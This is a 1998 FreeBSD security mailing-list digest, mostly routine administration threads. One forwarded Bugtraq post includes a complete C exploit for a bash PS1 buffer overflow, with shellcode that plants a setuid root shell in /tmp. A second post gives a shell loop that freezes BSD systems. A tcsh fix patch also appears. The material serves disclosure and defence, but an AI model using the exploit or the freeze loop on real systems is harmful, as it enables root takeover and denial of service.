21:17:42 +0200 (CEST) Received: from ripley(192.168.42.202) by morranon via smap (V2.1) id xma012102; Mon, 14 Sep 98 21:17:29 +0200 From: "Lutz Albers" To: "Archie Cobbs" , "John Fieber" Cc: , , Subject: RE: sshd Date: Mon, 14 Sep 1998 21:17:26 +0200 Message-ID: <000201bde014$4f3e1b80$ca2aa8c0@ripley.tavari.muc.de> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 In-reply-to: <199809140706.AAA16521@bubba.whistle.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > A more frustrating problem for me are ports that are not > > ${PREFIX} != /usr/local compatible which makes it a hassle to > > install multiple version of a port or separate ports that have > > common files. Also, I occasionaly go through phases of liking > > SysV way of installing things in /opt/, > > /etc/opt/ and /var/opt/ which a simple 'make > > PREFIX=/opt/' doesn't really accomplish. > > If someone was interested, it would be easy to write a script > that checks all the ports: (receipe for detecting misbehaving ports deleted) This will fail for X11 ports IMHO. The last time I checked they were installed into X11ROOT (/usr/X11R6). -- Lutz Albers, lutz@muc.de, pgp key available from Do not take life too seriously, you will never get out of it alive. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 22:13:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27330 for freebsd-security-outgoing; Mon, 14 Sep 1998 22:13:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27325 for ; Mon, 14 Sep 1998 22:13:01 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id BAA08116; Tue, 15 Sep 1998 01:12:35 -0400 (EDT) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: Michael Maxwell cc: freebsd-security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: innd 1.7.2 issues... In-reply-to: Your message of "Mon, 14 Sep 1998 12:42:39 CDT." <19980914124239.A5031@drwho.xnet.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 15 Sep 1998 01:12:35 -0400 Message-ID: <8112.905836355@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Maxwell wrote in message ID <19980914124239.A5031@drwho.xnet.com>: > Ok, this would make sense as I recognized one of the connections being from > a known spam domain (club-internet.fr) whom I've dealt with regarding their > spamming in the past. I just found it interesting that this has only just > started to occur. Check www.freenix.fr/top1000 to see if your server recently appeared... Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 23:10:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA03760 for freebsd-security-outgoing; Mon, 14 Sep 1998 23:10:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from leaf.lumiere.net (leaf.lumiere.net [207.218.152.15]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA03709 for ; Mon, 14 Sep 1998 23:09:59 -0700 (PDT) (envelope-from j@leaf.lumiere.net) Received: (from j@localhost) by leaf.lumiere.net (8.9.1/8.9.1) id XAA06950; Mon, 14 Sep 1998 23:09:49 -0700 (PDT) Date: Mon, 14 Sep 1998 23:09:49 -0700 (PDT) From: Jesse To: freebsd-security@FreeBSD.ORG Subject: sshd1 safety? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I've recently been hearing about issues with the latest (and final) version of ssh1 that theorectically might allow remote root (or lesser) exploits. Is anyone aware of such issues? I did searches on various sites such as rootshell, but didn't find any major exploits. I'm hoping this is a false rumor, since according to the new licensing in the ssh2 releases, I can't run ssh2. (sigh, I much prefer the ssh1 license). On a side note, anyone know of any good, secure alternatives to ssh? Thanks! --- Jesse http://www.lumiere.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 23:25:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA05290 for freebsd-security-outgoing; Mon, 14 Sep 1998 23:25:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net ([207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA05285 for ; Mon, 14 Sep 1998 23:25:46 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id BAA03443; Tue, 15 Sep 1998 01:25:28 -0500 (CDT) Received: from aridius-81.isdn.mke.execpc.com(169.207.66.208) by peak.mountin.net via smap (V1.3) id sma003441; Tue Sep 15 01:25:25 1998 Message-Id: <3.0.3.32.19980915012359.006dae0c@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Tue, 15 Sep 1998 01:23:59 -0500 To: Roger Marquis , freebsd-security@FreeBSD.ORG From: "Jeffrey J. Mountin" Subject: Re: sshd In-Reply-To: References: <35FD82A8.84601D49@dal.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:11 PM 9/14/98 -0700, Roger Marquis wrote: >On Mon, 14 Sep 1998, Studded wrote: >> Foolish consistency is the hobgoblin of small minds. I am also in the >> camp of those who disable inetd almost universally, and run sshd >> standalone. Since I don't think either camp is going to convince the >> other, perhaps we should let this drop? > >Au contraire, consistency is fundamental to good systems >administration. KISS and consistency are what keeps the Macintosh >alive despite all odds. KISS, consistency and efficiency are what >keeps sites with dozens or hundreds of Unix boxes running with high >uptime and a small staff. KISS may apply to the server config, but it can get a bit complex to set things up. ;) >If you don't need inetd then it's probably a good idea to disable it >and run all your daemons all the time however most hosts, including >firewalls, do use it. Is there a significant security (or other) >reason to disable it? One problem is if you want to run tcp wrappers, then some services should be inetd. And need we get into certain daemons that we shouldn't run directly. I'd say use inetd for certain daemons and use wrappers. telnet ftp pop3 finger ntalk The last 2 only work locally and between specific machines. For only DNS servers I've only run sshd, no inetd, no sendmail, and no remote logging. Since we've somewhat digressed, changing portmap in rc.conf to "NO" would also be in order and unless a server need to handle incoming mail, it should not run as a daemon. Different servers, different needs, and different security policies. Jeff Mountin - Unix Systems TCP/IP networking jeff@mountin.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 03:52:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA09070 for freebsd-security-outgoing; Tue, 15 Sep 1998 03:52:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA09064 for ; Tue, 15 Sep 1998 03:52:55 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id LAA24610 for ; Tue, 15 Sep 1998 11:52:36 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by bofh.fast.net.uk (8.9.1/8.8.8) with SMTP id LAA00407 for ; Tue, 15 Sep 1998 11:52:36 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Tue, 15 Sep 1998 11:52:36 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: security@FreeBSD.ORG Subject: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Background ---------- FreeBSD bofh.fast.net.uk 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0 root@bofh.fast.net.uk:/usr/src/sys/compile/GENERIC i386 login.conf (ulimit) restrictions: lockd:\ :priority=20:\ :openfiles=32:\ :openfiles-cur=32:\ :memoryuse-cur=10M:\ :maxproc-cur=32:\ :cputime=1h:\ :stacksize=2M:\ :memorylocked=4M:\ :memoryuse=10M:\ :coredumpsize=0M:\ :welcome=/etc/motd.lusers: Problem ------- Executing the following shell script effectively freezes a BSD box (tested on FreeBSD 2.2.6 & latest OpenBSD) regardless of the above process, cpu and memory restrictions within 15-30 seconds: #!/bin/bash while() do grep ohdear /dev/zero & done Any ideas on how to fix this or secure against it? Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 05:11:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA22252 for freebsd-security-outgoing; Tue, 15 Sep 1998 05:11:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from reg.avtlg.ru ([194.186.246.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA22235 for ; Tue, 15 Sep 1998 05:11:32 -0700 (PDT) (envelope-from vgus@reg.avtlg.ru) Received: from unita (unita.mtts-voljsky.ru [195.239.188.3]) by reg.avtlg.ru (8.8.6/8.8.6) with SMTP id QAA02055 for ; Tue, 15 Sep 1998 16:08:28 GMT Message-ID: <000c01beff73$299d9e30$03bcefc3@unita.mtts-voljsky.ru> From: "Ignatev" To: "list_Scurity_BSD" Date: Wed, 15 Sep 1999 16:08:48 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org help . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 05:53:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA29414 for freebsd-security-outgoing; Tue, 15 Sep 1998 05:53:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA29391 for ; Tue, 15 Sep 1998 05:53:17 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id OAA21692 for freebsd.org!freebsd-security; Tue, 15 Sep 1998 14:52:49 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id NAA01220 for freebsd-security@freebsd.org; Tue, 15 Sep 1998 13:04:43 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199809151104.NAA01220@CoDe.hu> Subject: csh/bash/tcsh/others? buffer overflow To: freebsd.org!freebsd-security@zg.CoDe.hu Date: Tue, 15 Sep 1998 13:04:43 +0200 (CEST) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Did anybody read in bugtraq the story about bash/tcsh overflow (with the code for Linux)? Well, I've tried it on 2.2.7-R with csh - the default shell for root - and it dumps core!. By the way, with a correct - and FreeBSD specific code, it might give root permissions, as the Linux trick with linux-emu (and a bash-specific code) doesn't work. Here are the most important letters about it: -------------------------------------------- Date: Sat, 5 Sep 1998 21:28:05 +0000 From: MiG Subject: BASH buffer overflow, LiNUX x86 exploit Here it is example exploit for buffer overflow in bash which occurs when there is set '\w' in PS1 environment variable (Joao Manuel Carolino post). This exploit was tested on Linux x86 systems: - - Debian 1.3.1, bash 2.0.0(1) - - Red Hat 5.0, bash 1.4.17(1) How it works: ~~~~~~~~~~~~~ Run it as ordinary user: [debian]:~$ id uid=1000(test) gid=1000(test) groups=1000(test) [debian]:~$ ./bashps1 BASH '\w' option in PS1 exploit example - Creating /tmp/tp.c - Compiling /tmp/tp.c to /tmp/tp - Removing /tmp/tp.c - Creating directories AAA.../AAA.../AAA.../CODE.../ADDR... - OK If everything goes fine you should have 'tp' file in /tmp dir: [debian]:~$ ls -l /tmp/tp -rwxr-xr-x 1 test test 3981 Sep 4 20:54 tp Then as root do: bash# export PS1='bash:\w\$ ' debian:~# cd ~test debian:/home/test# cd AAAAAAAA*/*/*/*/* shell-init: could not get current directory: getwd: cannot access parent directories shell-init: could not get current directory: getwd: cannot access parent directories The bash dies... Check if there is suid shell in tmp dir: [debian]:~$ ls -l /tmp/sh -rwsr-sr-x 1 root root 304676 Sep 4 20:55 sh Remember, whole directories are treated here as x86 assembler instructions, so AAA.../AAA... are: incl %ecx incl %ecx incl %ecx ... das incl %ecx incl %ecx incl %ecx ... So you can't change it on ordinary words, unless you know what you are doing. Here is it the code: - ----x----x----x----x----bashps1.c----x----x----x----x----x----x----x---- /* * BASH: '\w' in PS1 environment variable - x86 exploit * by Miroslaw Grzybek * * - tested on: DEBIAN LINUX 1.3.1, BASH 2.0.0(1) * RED HAT LINUX 5.0, BASH 1.4.17(1) * * THIS IS FOR EDUCATIONAL PURPOSES ONLY * USE IT AT YOUR OWN RISK * * When run, this program creates directories: * AAAAAA....../AAAAAA....../AAAAAA....../CODE......./RETADDR..... * (255 bytes) (255 bytes) (255 bytes) (50 bytes) (255 bytes) * * When you have '\w' included in your PS1 env. variable and * enter to the last of this directories, then "/tmp/tp" program is * executed and SUID shell "/tmp/sh" is created */ #include /* * Code we would like to run when stack is smashed */ char code[] = "\xeb\x24" /* jmp GETADDR */ /* RUNPROG: */ "\x5e" /* popl %esi */ "\x89\x76\x08" /* movl %esi,0x8(%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x88\x46\x07" /* movb %al,0x7(%esi) */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */ "\xfe\x06" /* incb (%esi) */ "\xfe\x46\x04" /* incb 0x4(%esi) */ "\xb0\x0b" /* movb $0xb,%al */ "\x89\xf3" /* movl %esi,%ebx */ "\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c" /* leal 0xc(%esi),%edx */ "\xcd\x80" /* int $0x80 */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x89\xd8" /* movl %ebx,%eax */ "\x40" /* incl %eax */ "\xcd\x80" /* int $0x80 */ /* GETADDR: */ "\xe8\xd7\xff\xff\xff" /* call RUNPROG */ ".tmp.tp"; /* Program to run .XXX.XX */ /* * Return address, you may have to change it if expl. doesn't works */ int ADDR=0xbffff2ff; void main(void) { char dir[256]; int i, align; printf("BASH '\\w' option in PS1 exploit example\n"); printf("- Creating /tmp/tp.c\n"); system("echo 'main() {' > /tmp/tp.c"); system("echo 'system(\"cp /bin/sh /tmp/sh\");' >> /tmp/tp.c"); system("echo 'system(\"chmod +s /tmp/sh\");' >> /tmp/tp.c"); system("echo '}' >> /tmp/tp.c"); printf("- Compiling /tmp/tp.c to /tmp/tp\n"); system("gcc -o /tmp/tp /tmp/tp.c"); printf("- Removing /tmp/tp.c\n"); system("rm -f /tmp/tp.c"); /* Computing alignment for the 'address' directory */ getcwd(dir,255); align=(strlen(dir)+2) % 4; memset(dir,'A',255); dir[255]=0; printf("- Creating directories AAA.../AAA.../AAA.../CODE.../ADDR...\n"); mkdir(dir,0777); chdir(dir); mkdir(dir,0777); chdir(dir); mkdir(dir,0777); chdir(dir); /* create directory which name is our code */ mkdir(code,0777); chdir(code); /* create directory which name is return addresses */ for(i=align;i<252;i+=4) *(int *)&dir[i]=ADDR; mkdir(dir,0777); chdir("../../../../"); printf("- OK\n\n"); } - ----x----x----x----x----x----x----x----x----x----x----x----x----x----x---- Miroslaw Grzybek, Cieszyn, POLAND http://www.polsl.gliwice.pl/~mig mig@polsl.gliwice.pl 5E 13 03 B7 EA A1 CC 15 50 48 C4 96 5A EA 04 -------------------------------------------- >From owner-bugtraq@NETSPACE.ORG Tue Sep 15 08:33:38 1998 Date: Tue, 15 Sep 1998 03:02:24 +0200 From: Wichert Akkerman Subject: tcsh buffer overflow After the whole mess with bash recently I decided to take a short look at tcsh and found it has the same problems. Although tcsh-scripts are very uncommon, it's still exploitable. Below is a patch which should fix the problems. --- --- tcsh-6.07.06.orig/sh.dir.c +++ tcsh-6.07.06/sh.dir.c @@ -78,7 +78,7 @@ char path[MAXPATHLEN]; =20 /* Don't believe the login shell home, because it may be a symlink */ - tcp =3D (char *) getwd(path); + tcp =3D (char *) getcwd(path, MAXPATHLEN); if (tcp =3D=3D NULL || *tcp =3D=3D '\0') { xprintf("%s: %s\n", progname, path); if (hp && *hp) { @@ -549,7 +549,8 @@ } #endif /* apollo */ =20 - (void) strcpy(ebuf, short2str(cp)); + (void) strncpy(ebuf, short2str(cp), MAXPATHLEN); // WTA: make sure we = don't overflow ebuf + ebuf[MAXPATHLEN-1]=3D0; /* * if we are ignoring symlinks, try to fix relatives now. * if we are expading symlinks, it should be done by now. @@ -1061,7 +1062,7 @@ #endif /* apollo */ continue; /* canonicalize the link */ } -#endif /* S_IFLNK */ +#endif /* S_IFLNKXYZ */ if (slash) *p =3D '/'; } @@ -1096,7 +1097,8 @@ /* * Start comparing dev & ino backwards */ - p2 =3D Strcpy(link, cp); + p2 =3D Strncpy(link, cp, MAXPATHLEN); // WTA: remember that length-check! + link[MAXPATHLEN-1]=3D0; found =3D 0; while (*p2 && stat(short2str(p2), &statbuf) !=3D -1) { if (DEV_DEV_COMPARE(statbuf.st_dev, home_dev) && @@ -1119,7 +1121,7 @@ cp =3D newcp; } } -#endif /* S_IFLNK */ +#endif /* S_IFLNKXYZ */ =20 #ifdef apollo if (slashslash) { @@ -1255,7 +1257,9 @@ return (0); } } - (void) Strcpy(s, dp->di_name); + + (void) Strncpy(s, dp->di_name, MAXPATHLEN); // WTA: assume MAXPATHLEN = is okay + s[MAXPATHLEN-1]=3D0; return (1); } -------------------------------------- Gabor Zahemszky ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 06:16:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA03133 for freebsd-security-outgoing; Tue, 15 Sep 1998 06:16:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hotmail.com (f172.hotmail.com [207.82.251.58]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id GAA03125 for ; Tue, 15 Sep 1998 06:16:01 -0700 (PDT) (envelope-from madrapour@hotmail.com) Received: (qmail 10860 invoked by uid 0); 15 Sep 1998 13:15:43 -0000 Message-ID: <19980915131543.10859.qmail@hotmail.com> Received: from 208.218.169.84 by www.hotmail.com with HTTP; Tue, 15 Sep 1998 06:15:43 PDT X-Originating-IP: [208.218.169.84] From: "N. N.M" To: netadmin@fastnet.co.uk Cc: freebsd-security@FreeBSD.ORG Subject: Re: A question probably relevant to IPFW Content-Type: text/plain Date: Tue, 15 Sep 1998 06:15:43 PDT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Just read through your e-mail again and what your experiencing >is *EXACTLY* the same as what I am. > >The home server was rebooting every so often, tended to be >early in the morning (about 2am) or in the event 6-7pm. > >There was no exact pattern to reboots (which led me >to believe it was either a DoS or a hardware failure) >and so I rebuilt the machine from completely different >components, upgraded BSD to the latest version (went >from 2.2.1 -> 2.2.6) and thought it was all working >fine. A few days later it started doing the same thing >and still does it although not as often. > >If I get chance, I'll put a packet sniffer on the network >(it's not that simple to do as everything is going through a >switch). > > > >Regards, > >Jay Tribick Hi, Did you have IPFW active on that machine? It seems to be relevant directly to IPFW and packet filtering, because as I said before, the other FreeBSD with the same configuration hasn't been rebooted after it hadn't to filter the packets. Another point: it is rebooted just at 2 am and it follows from a semi-routine timing. Being rebooted once in almost 2-3 days: Friday, Monday, Wednesday and the other week: Friday, Sunday, Tuesday! I have a line in /var/cron/log file as follow: .....[the time of reboot, 2.05 am] ... cron [8923] : (CRON) STARTUP (fork ok) Does anybody think that it might lead me to something? Thanks everyone who replied (and will reply!) me! (-: ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 06:28:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA06370 for freebsd-security-outgoing; Tue, 15 Sep 1998 06:28:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA06339 for ; Tue, 15 Sep 1998 06:28:18 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id OAA05609; Tue, 15 Sep 1998 14:27:56 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by bofh.fast.net.uk (8.9.1/8.8.8) with SMTP id OAA00773; Tue, 15 Sep 1998 14:27:56 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Tue, 15 Sep 1998 14:27:56 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: "N. N.M" cc: freebsd-security@FreeBSD.ORG Subject: Re: A question probably relevant to IPFW In-Reply-To: <19980915131543.10859.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi | >There was no exact pattern to reboots (which led me | >to believe it was either a DoS or a hardware failure) | >and so I rebuilt the machine from completely different | >components, upgraded BSD to the latest version (went | >from 2.2.1 -> 2.2.6) and thought it was all working | >fine. A few days later it started doing the same thing | >and still does it although not as often. | Did you have IPFW active on that machine? It seems to be relevant | directly to IPFW and packet filtering, because as I said before, the | other FreeBSD with the same configuration hasn't been rebooted after it | hadn't to filter the packets. | | Another point: it is rebooted just at 2 am and it follows from a | semi-routine timing. Being rebooted once in almost 2-3 days: Friday, | Monday, Wednesday and the other week: Friday, Sunday, Tuesday! | I have a line in /var/cron/log file as follow: | | .....[the time of reboot, 2.05 am] ... cron [8923] : (CRON) STARTUP | (fork ok) I do have ipfw active on the machine with packet filtering but just a default let-anything-through filter. I didn't get any log entries like this, I've even been logged in just before the machine's rebooted before and there was no-one else logged in, no strange netstat -i entries.. What was in your cron that starts up at this time? /etc/daily? home# time /etc/daily real 1m25.888s user 0m2.159s sys 0m12.067s This machine's only a P75 and yet it still manages to finish /etc/daily in 1minute 25seconds. Was it 02:05 exactly? Mine's not rebooted in 6 days btw.. Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 07:30:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA17793 for freebsd-security-outgoing; Tue, 15 Sep 1998 07:30:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAB17763 for ; Tue, 15 Sep 1998 07:30:40 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id LAA29506 for security@freebsd.org; Tue, 15 Sep 1998 11:29:40 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199809151429.LAA29506@ns1.sminter.com.ar> Subject: Tripwire configuration file To: security@FreeBSD.ORG Date: Tue, 15 Sep 1998 11:29:40 -0300 (GMT) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does anybody have a tw.conf more suitable for FreeBSD than the bsd one that comes with the tripwire distribution? Whishes to share it? ;-) TIA Fernando P. Schapachnik Administracion de la red S&M Internet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 07:40:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA20017 for freebsd-security-outgoing; Tue, 15 Sep 1998 07:40:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.intercom.com ([207.51.55.117]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA19952 for ; Tue, 15 Sep 1998 07:39:59 -0700 (PDT) (envelope-from jason@intercom.com) Received: from intercom.com (shagalicious.com [206.98.165.250]) by mail.intercom.com (8.9.0/8.9.0) with ESMTP id KAA11584; Tue, 15 Sep 1998 10:39:41 -0400 (EDT) Message-ID: <35FE7C66.5E73C4B6@intercom.com> Date: Tue, 15 Sep 1998 10:40:38 -0400 From: "Jason J. Horton" X-Sender: "Jason J. Horton" <@mail.intercom.com> X-Mailer: Mozilla 4.5b2 [en]C-NECCK (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Jay Tribick CC: security@FreeBSD.ORG Subject: Re: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Don't allow users on your system. -J Jay Tribick wrote: > > Background > ---------- > FreeBSD bofh.fast.net.uk 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0 > root@bofh.fast.net.uk:/usr/src/sys/compile/GENERIC i386 > > login.conf (ulimit) restrictions: > > lockd:\ > :priority=20:\ > :openfiles=32:\ > :openfiles-cur=32:\ > :memoryuse-cur=10M:\ > :maxproc-cur=32:\ > :cputime=1h:\ > :stacksize=2M:\ > :memorylocked=4M:\ > :memoryuse=10M:\ > :coredumpsize=0M:\ > :welcome=/etc/motd.lusers: > > Problem > ------- > Executing the following shell script effectively freezes a > BSD box (tested on FreeBSD 2.2.6 & latest OpenBSD) regardless of the above > process, cpu and memory restrictions within 15-30 seconds: > > #!/bin/bash > while() do > grep ohdear /dev/zero & > done > > Any ideas on how to fix this or secure against it? > Regards, > > Jay Tribick > -- > [| Network Admin | FastNet International | http://fast.net.uk/ |] > [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] > [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 07:42:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA20275 for freebsd-security-outgoing; Tue, 15 Sep 1998 07:42:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA20264 for ; Tue, 15 Sep 1998 07:42:22 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id 